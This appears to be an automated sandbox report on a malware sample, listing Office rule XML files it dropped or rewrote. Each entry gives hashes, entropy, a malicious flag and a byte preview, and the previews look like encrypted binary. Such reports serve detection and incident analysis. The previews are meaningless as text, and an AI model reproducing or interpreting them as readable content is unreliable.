                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1454
                                                                                                                                      Entropy (8bit):7.8548368714477395
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:Us0BZbfq1dgPyIOu0EJ9vJ27kH6RaRvcyXk2Z4TmAUr7vbD:Us03jqvcvz2AoaFcyXk2mdULD
                                                                                                                                      MD5:AFE98233E840C5ABB890CD7838B41233
                                                                                                                                      SHA1:B562DD5C7E7377BCFE413AB1733269EA8FF802C7
                                                                                                                                      SHA-256:62FE04C0F05B2B8EF9E11F5EB17B735A3C9D9A4E4EE3DE0E2D29C74E45C8C7AB
                                                                                                                                      SHA-512:8CE005356AC8BED223DD87CF337149D892295333F7033E58C46D49F65C0C25FC21EC2DB93437B6193BFA2A45924CC831A5C949F5EEF13AE5876D093C98F2EC0E
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml4.:.H..>d.....H.)P...'.x...O.....k..Z...#.k........."\...4.....M.B.O7!$M.....l..g.{.6..J..!.....#.M.B.!..h..RH.-1....Zb6......z.t.>..1i...9.n.P.7?.1.....f..Yd...b(..)........{F.;......5S.}*........DM..a..&..EN......9..F.l........V.#I-.@....Ci..H...o.6.b..*Zr..("X>...?.M.../%.0dgwh..''Y.&..K.V...#.R..A....XF.k^..S.p\.V.Z.w!.Y..)..[iN<8...L...+..:...]`f]Z.S.6\..:?.~9r..P.\...'.Q...M.......d.O7B.K15.4w'...n....$.9O9.....x?.4..%...B.D.....D..H.$PN..7.d..Q..P.zS.FD..9.L..+..R.Sp.....Np....n..*Y.#.U..W<..B...p..;...3...V.of...#.x."$`.\..:..E...RB|...u~mp....g...f.(o)..>.....OK<...^n..O....;..{.....u..@<.r....h.W@Q....I....a.82.D....Px..Ll>Wd..y...r0.C.8s..R&+jM~l.a.W{....S...v...H.......>..(..q..}......./.py.*...m%...7...@...%[@.%.R..(........u.....d..<..H._)......5w..t....n.....[..2..".(.....z........../..(.s.....<t.G.i...Cgg7...XH...p..1..B.$r%..7...8.vZ..+..IM.r._.g.-...7i_..!t.D...a&!.f......9......y.+..mJE.......f.S.v..:.|s....

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule370006v0.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1120
                                                                                                                                      Entropy (8bit):7.831914227615307
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:O18FBDGAbhsYO4AFxzDFEz3Y6HQIRqb3Gz//531bD:djDG0zhABEVnRqDOHD
                                                                                                                                      MD5:B6692274974DCD3076B8E157C941FA6B
                                                                                                                                      SHA1:4AF618757D6FE39BDDCC2F3A93933A070C511064
                                                                                                                                      SHA-256:7A65F7E084FD738E46AA05A234EE3E529C2462DFE3DE9A85646708449F56C643
                                                                                                                                      SHA-512:DBF7E64C04894A90E0CD5E9381A8C1DC2BF57B06301153311B5D2A0E22B850B72F3323A6606995A5055A61EC51B2E5CE1DF8F430CE2FBEB8FE93F2CDE34A7155
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml.....U.,..sg7;..u.......L..d....>.&........fL.M.I?.......z..'$|.y..ACm.KB...s!.X.T2E,..z....ca.Jg..l.8...Z.b......vj..:..87t..p.....i[uB`F.M..J.........o..xd....:..G.oE...k.R..m^.IA..?.~..nL.3.'!s...r7t.b.....a.w.7..................@.z.{7.U.U...J...../3....\..oiw....D.....[..)....j..t52)*.^k.q.6?H.XM..q@/...............xj#/..,......O.....g..P.s...8....C.j.6. ..J[N.o..@..`.X+...x..B..!.G........(.........k..R.?.~.z|....<.....B.^.H...iE.O.C....3..N)....Y;d..E>et..L..g..f..m.%..9..b4.....(.D.H....h...&......T@.$......c..e.../L_..a....#..d_...Ws0........a..Q..h....SG .@.b.....[P.JR0.I....i...k\.....O........F.L.N.....B.GY..CCQ....c..t...Y.........X.;..:1h....Gmp......E._.M..a`PT...Ry.....$.tt|.Od.Ng..(M|.......k!.X..B.yUD......W.p.e.)]x`.6l%Q. .F.f....#.d.r..!H.N0.=".J......L.KD*...^..H:.[.!..A.~...hi..dV........u.s..zG~.E7L..[..?`Z...jS8.6LZY...^^..9.A...e..z.P.(._....<..V.eY..ts)h...{..'....#[..tc....d..=...y..{.%.Hj.....+d... .x.Cd.7.

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule370007v3.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):3678
                                                                                                                                      Entropy (8bit):7.9455604148881775
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:96:tZlkqrzyU/SgU6RMOOiLq4HKS69+cQ+Dz:Vzr7/7vMOOiLnKSxo
                                                                                                                                      MD5:2F8FA72F697210371891946AF31735AF
                                                                                                                                      SHA1:BFB6CEBBAC7C77162B1C3521D2D56973C95C9106
                                                                                                                                      SHA-256:3BE67F6675F9D05D29C68BF45EB30E5ED1BD1F1CFCF3E2896299BC1B7700B43D
                                                                                                                                      SHA-512:97B66C106B3E0E682A9BD3EA308192FE958881710951EB41FBBAA580269B0616AF24CD9B6C2AAB77686FEBEAAFAEA0372FEE6A28A241691535134A05CCCCD909
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml.2.z"....f.b(.92....`+.W..0rD.....Tn.].......\.H.....jr}.JV...i...)....v{.N.i....|i.>L.t..b..d$k....<.(.#7..'.x.S...=..z>....]m+.G..W..w.d...p..k1pz...#..........U..Rkx.....*/+..v.o.._...y|uD.e.....P...{...~=.c,.Gh...in....p.....PY.9..os.....3.......B...._}...[..(U.Q.q......~p.*..K...C.FF........!9...C.l.9...%.S.P..).............%W.....Q.Q.1&.Cn...d.....{....aJ..HO....Q.TA...........u.....pI.._k.Z.+...;zg.8rm.+..e.9........h...e......9.....0.T.H...d70.[.....@.GO...2...a./...L`&=ky../.<......O...:.. ..:..>\....8..Z.....!..;..1:.p.....B...r...{..I.....9.(......T...r.4.e+...O..H.K..S...O|......b-.;....#......!...;.&...t...tJ.p.......Y0......\...b.X...:.....\..Y1..g....'.i..0.=...J..$.ku*..y....y.9wT.UC.hq.Z-..o.Q.Kc0D......$`...F..Up.&cM..*b3{...n..p.Ri...g..2.OC6Uy..*...!g..?..X<....L>N.-n.,T.Kx...Uqz..#.|2!.{..]5C........n.w.....2... q.7.s..Me.*.C..t..Qs..sbxD.0.b*..If.;{q..?..=w6..A....6..K..k.Mes<.2..k...3..p..-......yu...

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule370009v0.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):961
                                                                                                                                      Entropy (8bit):7.748563691067441
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12:lJGQ2c+n8MyKz7k7Wtr0pyAHQ9U6vALCYwvIwaucg94mEuXf/ucJgVikLRdC4R0j:llB+UitP9bSg9AuecJgBR9R0DXbD
                                                                                                                                      MD5:7852FA5A1A200E866256A0BD9B0E4DF3
                                                                                                                                      SHA1:CF0AC5551E0A054303BB6888287CE6EA566593DB
                                                                                                                                      SHA-256:61D542A3D97662C6AF9264997747B99DBC9E9EF0D4E935B6976A78C872DF585D
                                                                                                                                      SHA-512:C870D885DB48E6C237B34A450B96E1D28F2B599C20ECA1D56BE421450010C6160E27A429904A54F7A43EA075E7E44DB0C2D7B26BEA144043CE321B410B319FC8
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xmlth....dl7..$ix.!.E......A.Be+t.*)TXn.,.c.....>.^l...!=i....D..(R.0...A<...P..*.]5)3O...r.].....t....-.6V...:.O=g.Sq.J..j=>...;..@.1p.a.H.1/....j|.@VD....H...8.Y*....bF......o.I.\...9..2w../.gH....bOI,G.....:FHzJ._...yi.U...m...i...Phu..aw...Q..cf.i..2.S.8..;.%,4.Ni^.FA...o.#.>FZ.>BJ'..=?.w.d......C...w..%..X,.....\...Z+.nQJ^7.&.k.R..2h...OW..D..^.%.2.W....{......WD.E>MK#@....2'...a,.Y.I..........wB.X$...FK.O..Q..T}&j.a..3HhK..^J.#..s...p....1AU.n..MX_._l.../nIw.....b~3...u"......{.F.B...|....g*.c,!._...}.....Z..=.6;f...+.7:k....D.@..4.. .z...a...n..1,....*....Z..Q.....n...v.].c.Xm......XE....e+.O \./......A3Ti..1..}m....*H.&.f....s.R.....S.....(.r..,w.e.ic....N..$......w.|&3..(..KW..G..N.....~.......=..9.K.0[Tcq...3cFuLW1[M85.1.j.....?.Y/.G...*._fr....i..be.$:..2.K..MK.....%L..[]j.+R.@..?9...gx.R..:X..%J.S-.s...H...7Z&......tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule370011v1.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1191
                                                                                                                                      Entropy (8bit):7.851238188819169
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:4LCkvhdtf/uqy+xnIrHGOlHOarfLAIAj5o6HBash1RloeGPyakHBv9dZbD:srtf/rxnILGuHVl617oeGBIBv9TD
                                                                                                                                      MD5:F5F4E11C0B82E11C500216FCE0409196
                                                                                                                                      SHA1:3A52EFB9D9D648822ADA307CA624BE8F59077450
                                                                                                                                      SHA-256:48FE557074C1351323C18CCBE11443CB977F407E09C00C93BAD0495A8FBC8533
                                                                                                                                      SHA-512:4001A96A7D91C4553DFE3C18A9CE1025A901BB7445D13DB0EDF157DD457A0EF38C9DC1BCC7D9080A163A7F14F5CB78ADB2EA4473D5D5CFB4A4224F4350B99B5D
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml..z!.....;.q7....E.y..O..F..;......7.Dz*.......@..g..+...~....0..9....l....!-Jv.5o|....xK.XM.....r....d...}......6.$.....\^.2.4..I.6.(lC.^"..[.&VO...Y....I..m.u....ia..0..|....D.$...:..>nZ.".S.Z...{...1ZuU<9B._G8...... Y....X.....a0..h...T..E.7......q.....@..Q,h.c.O.W?p.`...T..33....u.w.P7..0QT...s[.B.1.B.5|..O...M..XK..P......h..L$l.P.{.e:.V..%.....w..ds.7=%v@...SThk.[.n.P_..iy.D!ed...q...^.......V.pO...DK.a.{...=..F.).....B......#..E.J..I.F.W.b..je.R..T.....X......Vb..Rs...FG(.....f..G..r.g3.m...K.T...y..$~.....vx_Q...]hhb.).eF.s..h.i...%..rtc@qP..t...H.I!..|Xg...9G6$C?....Blv..a3.}.Jc...8.Xt..\P:P../...g.be6[t.*rM..b<..\.?L(...&ol.S.9DL.g>..2N..*....N..h.,....,.,2G.}k8?..6.d-...onH..G.oa......$=&o..-.ec.Y7.Z=.1._....._...u..J.....>.<b.].25.e..R..#.T..p....%d..A+......:. .F!AZ.&.2.....=....._...2da....i.......f...).H...'.x....P....&.y.a\.KT......`gL|...6.4V..C..'.....I..vV..C.*.o.F....X\.k.=....\-..bTj...wm...... }.in........z....

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule370012v0.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):732
                                                                                                                                      Entropy (8bit):7.726323787525595
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12:osBlW5Qq/v5B2JiDEGc6teNRHiIjcerbGgy5h6hHNAKTKXSIHuukIcii9a:oEMvf2J1GZtuRHiizvHNluXSmbD
                                                                                                                                      MD5:B247E7B4D6B90A3ABBE01350F0C5EEE6
                                                                                                                                      SHA1:45273B737B233990497997A2E1E5202E0DBFE7C0
                                                                                                                                      SHA-256:25066B5EC7FA82CAA3260476FFC94605A2C56671B87992678B3B99B26BC0A3AF
                                                                                                                                      SHA-512:978CB0F2468A6A2E6BF3BEC301B19BF375B8F1AFB78B66CB8150E828A7F8E26BF9379EACE57CC5529FB2E3BB6327A77EFA07B603BA6F0B98484830F83FE4D548
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml..9.......#B,wx./ . ...=8R....9G.p.U.v$.'?...s%....>.a...f.aa8.{.9....yR....n..r>.}%.'..W..."..v..=2..%{.S.|....S.0..$.pw&R=..c.......~.m..=...l....W...5S...&b.q.!....7..............q.6Q?..<.v$.3p.33`..V.b....JHk.0.........2........Cfxa..e..H...21..._.....C<.........hDs:ZW............%.....<\...@m..&.bS.Y......%.j.\.h.......D$...d8.......q./.jp...=8J..3.S!@wm?g..9.7U...y.p..N......$......A.*.m..;..+....:..<......|i..x#..#.Fs..0...b.M'$.I.oJ....R/.*'..O4#.O..M..%M;..U.PI.V.....b>.B..#}&F.....7....O........T..5.....s.k....YIm.t.w....Y..P..D...Mw..R#.Y.Y.o_c.&JS..G....~.^.H.:..]F.G....... ...6...t.i.&.fytp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule390004v3.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):3616
                                                                                                                                      Entropy (8bit):7.944365138230489
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:96:QU9wVaIDES/edeKEFVMZGroNX4SW6XxA0ECDUvNOvMava1Q0/nNk4:f69DEPd1EDMZjmrCY8vMava1Q0/Nk4
                                                                                                                                      MD5:B1225E65D7A581190415901E7806E1F1
                                                                                                                                      SHA1:39135D4DF3C7942381A4EB0D49FF689A8E070FF3
                                                                                                                                      SHA-256:FC5523A6863CEC5A287CE5F616870E1743CA677E24005A463927CF327B611649
                                                                                                                                      SHA-512:6EC2B1E5DD6E9E436815F53087CD40CE00EAA6CDAB68AD43AE8B0C0AEB62FEC3412A2A2B17C8850CCA05CE1CCAC5F52363DA6873F5D3270FF6D258B50861C80E
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml..dq........Z5QgKsL....._....0....f^..L.6..<.2..Ho.B.........M...$^..*$i..R..u.#..<..T;F......I;...ZC|Z...wV.H.....y.+U5...{@..g..+...K.N..G.JB.....h=..d.......H.O=.T.:.Q5n..b.....;dL..Q.P.A.[&.!...E..\N...)..3.R...UJ....Hk.p..w.v..0..:..".>..$2Q...6.e.?.....{N4.+..= .n...Q#.e`.."5*.2KT..F....<.C..G^)..3.J..nN.Y._..../:...........(... .....l"k.2Ny..e...4#.W.z.f.Y..8=.32m.......C..]...R.h:...<.eq...s...F".D."b..A{...M.......t3..s.sO.R....'.1.|..$.;8.b.RD..j.....m........r.@5..aLK..k.q.....f|.....Y.....U..W....f.3........^.......{.O.^....#GM1*.k..K.=\NA..&D8.T?...H.,vX...].....l.8N..t....<...k.C=.$}./S.W...N..$..........%..jZ.l...k:.\.U.eu..-....q.].k..d(r..7.&...$..b....%.uE..<b\B....V.X....V......K.........A..B...*!)I...a...(..W........\..'a..........{.W. ...... )...2...Z.ud....uT.r...|...bL..T+^. )i,...NH..0..W....RoR.3|Issa=+rIL..E..6.+......O.V......=......e..!.....m.f..$..h=:....Tk.......RC...@.03AX.bt.....@....k,..vy!r

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule390005v1.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):783
                                                                                                                                      Entropy (8bit):7.7723415541796665
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:pg3aOgzE5pOpbpduHqfE2lrxDi50ByZbD:u3aOd2bNblr455D
                                                                                                                                      MD5:76856648255D33E32E56EB0780A077E6
                                                                                                                                      SHA1:50F53729E7068C8902F7CDC3510713916D15E797
                                                                                                                                      SHA-256:3B34394BC5D9A50F08D46F1B92516FC0628E5D051C1FA17215733C93696916BE
                                                                                                                                      SHA-512:82021B5A32E971A57A2DF0E2B0263CAFDEF29A398B52D3537862D275EA854DF7DC5B73EA5D61DEF7509803458B9D088135C70C362A70A5805B705C40B0FECDAD
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml........Xf./{.....4....e.g....4..........v.N\..<.H..eM.....{.....J..w....,G..P.7....u..Rm...$...*R.4k..X`.@...PK..I.aq#...O.....j;..j...2s)h.X.....*....M.B..l.....,].cy....D.e..j*...vB....aMR./......D.y^.g.<!..b?+Tjo~..........!.9...(..*.i..y..F...*....OG8..LR........yS.SH..Ge......%..?.....@u.."...i=..O#..-$O.eH$&..e....p...w..-&o6eoI...._.fo...?Z..w[p...d....C.d.^.X...I.........\.v..d.......z.s.#...w.8.^......[d..r<.2..../?LT9'.o..U.B.^..........1Q...I....( ..{.m...K>...*c............K..l;..-.DF5I#..$V..."U....h...V..........I.i.......9..^.F2..A#9.....{.....Os.^3....#[:......j.T..Fs...Fl.k...7.<?1_'..0|,.....0.FR.LK_e...).>.5.!.....#S...}#W...tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule440000v3.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):2331
                                                                                                                                      Entropy (8bit):7.907996117069854
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:nPWv+3EAZkMxC3wLlFyNX24x2tqBKMs5l1Gv5W5QX5+PF6D:nPlUANBFyNXrMmTqjHQX3
                                                                                                                                      MD5:4F75750B568E4C86248ED032B4961D1C
                                                                                                                                      SHA1:29A40D8C15BFD86C7043708DB9627A1BBB4D93B6
                                                                                                                                      SHA-256:AF7B92FC249D58B81EC23810948522D7BFD7B213B06CA7BD24DDF6125B9EF835
                                                                                                                                      SHA-512:DC03B65839774B39C7AC138EE4D24C61305577B68B0BB61D0A3E91B5B3D17A24077D3C5D99B9AC158C7E94040CDE0863D98AAF89EACBFFC4A7A873DEBC3021AF
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xmle.'Q;d.tq...AI.k.VuD.....q..-.|.g....j`..^.P....P.wf..p.D..?_6..*....pe.a....|..F....Y.qG..}#..'y.k..`TC.1".../kw.:..1..q...i..].URD9.[`.l..!QF.9.....Nd.....P...s..!..1.. .'__/.o.6...1G.3Q...e......F..Q.Z..M.PBo.v...^...>..Q..g.....4.w...A...........i~P..N.i@ .d+.5hv....b...u..-.hgRX$z..!....p.qq...n.."...<..8.]..Fw..D.^.j...),..(.O.E3.H.p...rvD....`..{*G.Y.{-.....0..]e.]Y!?.q...G....Z.....oE.4.........=j.mJ...t<.....)Z3C-..w..L9>...r..L]..{...Lb.b.....q.....9/.A.}.Rms.=..qK28m....v|v..y.....q...9E].N.F.<x....6|8..."=b.....Tb..\.+_O..e........fH..R..p...V..c!.@4X.:..i..h...x.#...h..y.....Z.;.|...F..N.c.s.o.7.-l..g...k~.t;.*Q.q..Md..O...B.U.......*.g..q..{[.r.#...G.; ..8./5S...F..>e.E.X....6.:?.....Dh?xAM.c@.%..%.._..>............`......K...o.~F......."..D....\....FW..A.s..~F...,qc.7e...0.....$.*p..\$.n.7<0.H%..`..`#a..t).2..o.......8?..t...Bd.K/.p.L.z...Mh..u.....Q.....%..Vv`..F.%.E`.B...."....(...zi.f.!9,<...6T+..n`.......].....

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule440002v9.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):44492
                                                                                                                                      Entropy (8bit):7.995797175373762
                                                                                                                                      Encrypted:true
                                                                                                                                      SSDEEP:768:lOJa0qcf9wbeqzfSdWPFo0zaJoM77EiO21T2ws1d0eyH+MPoNmWJtxkyvGJ4pesK:lOJKAOb3zf2JoMPEGSYH+w2xVj30SWf
                                                                                                                                      MD5:866082868E451B658E173C63722A1FBF
                                                                                                                                      SHA1:F6E6071188EF1BF3490BAF3BCD6CC7D9058E1B93
                                                                                                                                      SHA-256:88C02C1C4A0AB8C729E7E07762E7D61C9284982D11F1432B514D8F800FDB686A
                                                                                                                                      SHA-512:0A5802643D48206FE32BDB4C62B3B5E8D89269A8763316977FC69B86DF99EB2752E53A71A3EF3782962B30154017BDCDBECCC1D971E70498D535F7B53CE59989
                                                                                                                                      Malicious:true
                                                                                                                                      Preview:<?xmlC...[....p.G..}...OsW....VwglL.9.s.c.55ZJP ....Q%X.+f.B.s...X.....p..m...*G.D.....0...............ib...m..oO...<...w.......U......+..Q..]..BAM`v...Jw......o@.......[..c>...(2.n.J3.....9.w.z......=.].%..YcX.......K.....,l.!.*.nx.v..=...I#K...b-}..}Zu.R"Z2g.....N..R....3..bKxK..f...q.F.../w".....]k...5.r..e..9.A..0i....b.....5.H...-$./L.....a..8.yBC.Y..?.5-...n.^r....m....1.f....b%+K/...d.z.`\.G........gJG...je....V..cH......T.@...r..1..c..."D...<....V..X...h..$*?.c...i..8..l.te.B.....{...&J.M.d...F?..~.T....R.8..a&7.H,.......y..........p._.:......gW'...n>Pn.S.m.......m..o.Ep......_.)f..b.!.K...R..%.<.Z.bG.n..P...J.'..rc.7@..d...zE....DF.M..UO.u.,/Di.x|E....X..>..g...o?.&.A..N...J..*...;..zXG..E......hHCV.T.....W....0.....uS;.L<.n....u.O.#.F...E.R.t.~v.ug<...'.#6......J.y.?.9`. E%.W)dS......_.B"..&K.......%..q<..T.......i.hF...e..X...d"9.........B...8)....Pj..6.......eY...M.7Z../1.,.b......".Kb&<...$..%:..~.s.z.O,u...x...t}...&{...R..

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule440004v3.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):2338
                                                                                                                                      Entropy (8bit):7.903715371306993
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:Mjlzx8KlP3uaCDFGcBVwjGnh7DNiCNOgws+GglcZ3r7ald65H+FgA+1zfD:MsKlP+aKFrwj87DNiLP3lcZ3ylCHwAzL
                                                                                                                                      MD5:91DB082BE6A76737FFBBE1812A82A6E4
                                                                                                                                      SHA1:BF49A18909BCA1DB0692E140369742CEA57E1EAE
                                                                                                                                      SHA-256:97741A5A04F781ABA98AA492D9D712205E65E4AC4B9F18C706D2A2CA5BBF0CA9
                                                                                                                                      SHA-512:E40DCB345BA38E7790E944F58C924D6F20E8842937C3AD4731936B5C7E36495BA9A51436C4BE36F3CD648FB1F203089ACFC5BA5C52B815862DD9FD14BD5F559A
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml3. ...q%.F..[Z....V..|..Vl..cUJ.\....G.g..NV.eTMg+(p......(....KH................_<("Mf.ML.`...Q..F(..2g.K......_I./I.k..>.'...p./...........M...>..M.0".d.4.....+jA.d......Jgm..2"...Pd. ...Y.cN.[..z.].F9<@.FQR..l...ly-0#...o...!T.4d.'E...Fwvt.`r".9b~.f....sL.XT.i..FDQ...Il5..7..<I.f$.F+IS.vG....^.....A_.V.}9.c.....}X..p.._..C".._].O....._i.....w..k..[G..b:..*.$..iy.e.....:q..q..d..>.Y=..%$..c=>5..%..1e........P.(~.....)...&/.!,.f...n..a<E.....{_...c.......7Mw.../...Z.C...E..bKR....[4.2...s.P..;..0....t..%g8.M.;......h..]q.m.......>.6p.n.u.F...tDkf.....xe.....&o..tq....U1{...k.g.G......DK../.W-..L..[b.d.Z...mo.T......<.q...IdJ:.......*..N..."ZP..;;..8'T...d..`.I.m..I..6.ZP.k....L}..-D}Pm.1N...u}j.c...Z.......zEN....h..p.........pV"(.1wP.>..j.}rA..!c_NN.h.x.......wH.i.."..`2.c]%.&..c.a.^B.,.s.So..D..A7...>\..2.#/..1...=..Y.O.A..C.Ya...~<.q....x.+..>.%.Y.>?j.>...q...;.4..C...%..IR#-.r..b..P.p.l2D.0....7.{..X.}...5Q.r......i..!1..H..e...u..$/.j._.

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule440005v3.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):2320
                                                                                                                                      Entropy (8bit):7.9212018388146355
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:GH12XqXhFgC29BoaEUG6glwpOSzrtURVT06tRHsFk3jKXniLKlF9D:012XWiC4BookSvgVhHK31FF
                                                                                                                                      MD5:582368111D5AEDBC4383D64BE1AD49E2
                                                                                                                                      SHA1:79200766B69E4E48723C63ECA95F6A8EAE5AE7F6
                                                                                                                                      SHA-256:B4D1D008B596D228E8BEA8CE3C93221F630F84D87115FABDCAEA99E937DE8FCF
                                                                                                                                      SHA-512:54CBC3D6B8F92B48A0BE3C6664A26333EA82EC364682DDF254271F31E9B6164B9A1F98EE02A34555BCC97F0280BF446750D17D29748057899307334312336765
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml.LX.....\.i}.=.....39M.NO.)g.....).........-.7IS.+..F. ..'..Wze.I.....5."O..W.3WY.....!...s....uk.4.h~.....f...|..T"/}..du.....R...'5...o.GH.....3...3B....u.I.........c.F..%S....2f.....o..z&.).`.........f&.Q.v.t.}w...Jk..!N......2.a/.]_.Q.a...G....pPe....in.>..j9U...I...g8.Lh.....!{.].%t...4....5..ZC.......;.....=.E.iy.).n.;....V.."o.....9t.$U...Sr...U]..D...1..~..\r9...|.\..Lt....)..-.6`..C.....@.....'..g...!.zk...i.|.t.!p...c........0?a.+G.iR....Er.0HV..S.*......2F.h6._.H....o......."...+.-...x.....5G....A.d3T..H........h.t.Y.c{3..wU8.i..{=I.....f(.M.3.]...W~i.....-.`!..S).V.s.'yP... ."...U~8P..h.O....E.@O.(....X..).%....~..^..b.....V....[..G..$.W.3..........&...(.0{...no........L........N..XeK)...lj.q..w.x.".o0..*.... >...i..V.."\..q\..JzI1.9...5...'....4...U.y1Q%..?....p.5IOe._Z.....f..bH....NX..2..^.lL.6.[P.S.^......!m.1?........:.rzB.Tf...n.3GKR...`|.....\<....g.y..B?cWu.S.B...w?.M.p......!.J....Z.9.....{..........A......

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule440007v3.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):41208
                                                                                                                                      Entropy (8bit):7.995564876437575
                                                                                                                                      Encrypted:true
                                                                                                                                      SSDEEP:768:HOSF58A9NYusSEhv9roYbc8T8P0FnhWmvFD7K8XU8HoYrc4Z6ID8aQloP6:uiz9N3gNTTL0m9HK8XUz0cTID8aQl06
                                                                                                                                      MD5:F0E6DA7B00A1BC30ABF616844B360DE4
                                                                                                                                      SHA1:31F2FA77C960507B0925882EA1F73D24F065C4CD
                                                                                                                                      SHA-256:BA5FE30ED212C5DC3624CDB48C5DC2C5CDA43CE8DA8FD7726974A66D9BFBB09B
                                                                                                                                      SHA-512:FA22B2F6BB079FCD8C609E144BA8DF91BE7BC0604D8AAE24A483C6F0DD454C8AB4B09C6402F965E730ECA3624359023FCC10A5A6BC7A4FAF8E926E113D2C15A0
                                                                                                                                      Malicious:true
